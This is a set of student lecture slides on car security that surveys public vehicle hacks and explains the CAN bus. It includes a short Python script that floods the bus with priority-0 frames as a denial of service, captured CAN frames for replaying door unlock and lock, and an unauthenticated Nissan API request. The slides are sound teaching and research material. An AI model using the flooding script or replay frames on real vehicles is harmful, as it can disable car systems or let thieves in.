Car Security Attacking On the CAN Bus Student : Tien-Chih Lin@NCKU Advisor : PK, Birdman, Benson, Alan

$ Outline • Attack Vector • Intro of CAN Bus • Security Issues on CAN Bus • Conclusion

>_ Attack Vector

$ Attack Vector Overview

$ Physical Attack • Attack Interface • USB Ports • SD-Card Ports • CD-ROM / DVD-ROM • Touch Screen • CAT-5

$ Case Study : CAT-5 • DEFCON 23 - How to Hack a Tesla Model S

No content

$ Scanning with nmap Device IP Port Service CID (Central Information Display) 192.168.90.100 22/tcp ssh 53/tcp domain 80/tcp http 111/tcp rpcbind 2049/tcp nfs 6000/tcp X11 IC (Instrument Cluster) 192.168.90.101 22/tcp ssh 111/tcp rpcbind 6000/tcp X11 Gateway 192.168.90.102 23/tcp telnet 1050/tcp java-or-OTGfileshare

No content

No content

$ Remote Attack • Attack Interface • Bluetooth • Wi-Fi • Cellular Connection • Remote Keyless Entry • TPMS

$ Case Study : Remote Keyless Entry • Fix Code UID, btn UID, btn

$ Case Study : Remote Keyless Entry • Rolling Code UID, enck ctr′, btn UID, enck ctr′ + 1 , btn UID, enck ctr′ + 2 , btn ctr ctr + ∆ validity windows Decrypt ctr’ if(ctr < ctr’ < ctr + ∆ ) ctr := ctr’ open/close

$ Case Study : Remote Keyless Entry • Attack Rolling Code enck UID, ctr′, btn Attack crypto Attack key management

$ Wireless Hacking Unlock 100 Million Volkswagens, 2016

$ Case Study : API • Controlling vehicle features of Nissan LEAFs across the globe via vulnerable APIs

$ Request • GET https://[redacted].com/orchestration_1111/g dc/RemoteACRecordsRequest.php?RegionCo de=NE&lg=noNO&DCMID=&VIN=SJNFAAZE0 U60XXXXX

{ status: 200, message: "success", BatteryStatusRecords: { OperationResult: "START", OperationDateAndTime: "jan 21, 2016 21:47", BatteryStatus: { Battery ChargingStatus: "NORMAL_CHARGING", BatteryCapacity: "12", BatteryRemainingAmount: "12", BatteryRemainingAmountWH: "", }, PluginState: "CONNECTED", CruisingRangeAcOn: "135664.0", Cruising RangeAcOff: "157904.0", NotificationDateAndTime: "2016/01/21 20:47", TargetDate: "2016/01/21 20:47" } } $ Respond

$ API without Authentication • GET https://[redacted].com/orchestration_1111/g dc/RemoteACRecordsRequest.php?RegionCo de=NE&lg=noNO&DCMID=&VIN=SJNFAAZE0 U60XXXXX • VIN : Vehicle Identification Number

No content

$ Case Study : Wi-Fi • Black Hat 2017 : Free-fall: Tesla Hacking Get control of Wi-fi Exploit the Webkit Browser Root the in-vehicle system Patch and Disable AppArmor Bypass ECU’s firmware integrity verification Reprogram modified Gateway firmware Send malicious CAN msg on CAN Bus Get Control of CAN Bus CID ECUs

Why Hacking the CAN Bus?

>_ Intro of CAN Bus

$ What is CAN Bus? • Controller Area Network • Low cost, integrated controllers Head light Tail light Dash board Doors ABS Engine Control Suspension Control Gateway Low Speed CAN Body Control Bus High Speed CAN Powertrain Control Bus

$ CAN Data Frame Format Arbitration Identifier(ArbID) 11 bits or 29 bits Data Length Code (DLC) 4 bits Data Up to 8 Byte

$ CAN Bus Arbitration • Support by Hardware • Software implementation becomes easily and immediacy. • priority : 0 > 1

$ Fault Confinement Error Active Error Passive Bus Off Reset and Config REC => 127 or TEC => 127 TEC > 255 Reset, Config and Reception of 128x11 Recessive Bits REC < 127 or TEC < 127 REC: Receive Error Counter TEC: Transmit Error Counter

>_ Security Issues on CAN Bus

$ Denial-of-Service import ics device = ics.find_devices()[0] ics.open_device(device) NetworkID = ics.NETID_HSCAN ics.set_bit_rate(device,500000,NetworkID) msg = ics.SpyMessage() # Setup the message msg.ArbIDOrHeader = 0x0 # CAN ID msg.NetworkID = NetworkID # Channel 1 on the ValueCAN msg.Data = (0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0) while(1): ics.transmit_messages(device, msg)

$ Testbed

$ Result

$ Replay Attack Head light Tail light Dash board Doors ABS Engine Control Suspension Control Gateway Attacker

$ Testbed

$ Unlock the Door ArbID Data… 44D 4D,00,80,00,00,00,00,00 440 40,00,80,11,01,0F,0F,0F 442 42,00,80,00,00,00,00,00 44D 4D,01,80,00,01,00,00,00 440 40,01,80,11,01,00,00,00 631 18,80,53,04,00,12,00,00

$ Lock the Door ArbID Data… 44D 4D,00,80,00,00,00,00,00 440 40,00,80,11,01,0F,0F,0F 442 42,00,80,00,00,00,00,00 44D 4D,01,80,00,01,00,00,00 440 40,01,80,11,01,00,00,00 631 18,80,53,02,00,12,00,00

$ Demo

>_ Conclusion • Survey of the Car Security − The skill of cyber security is useful in Car security. • CAN Bus − A useful protocol before the car connect to the Internet. − Easy attack by DoS and replay attack.

$ Reference • https://hitcon.org/2018/CMT/slide-files/d2_s0_r0_keynote.pdf • http://www.blackhat.com/docs/asia-15/materials/asia-15-Evenchick-Hopping-On- The-Can-Bus.pdf • http://www.cheyun.com/content/15847 • http://illmatics.com/carhacking.html • https://www.tomshardware.co.uk/intel-automotive-security-review-board,news- 51291.html • https://blog.lookout.com/hacking-a-tesla • https://www.blackhat.com/docs/us-17/thursday/us-17-Nie-Free-Fall-Hacking-Tesla- From-Wireless-To-CAN-Bus.pdf • https://www.cryptacus.eu/en/wp-content/uploads/201611_WG4_Garcia.pdf • https://www.troyhunt.com/controlling-vehicle-features-of-nissan/ • http://wiki.csie.ncku.edu.tw/embedded/CAN • https://goo.gl/kXyyhx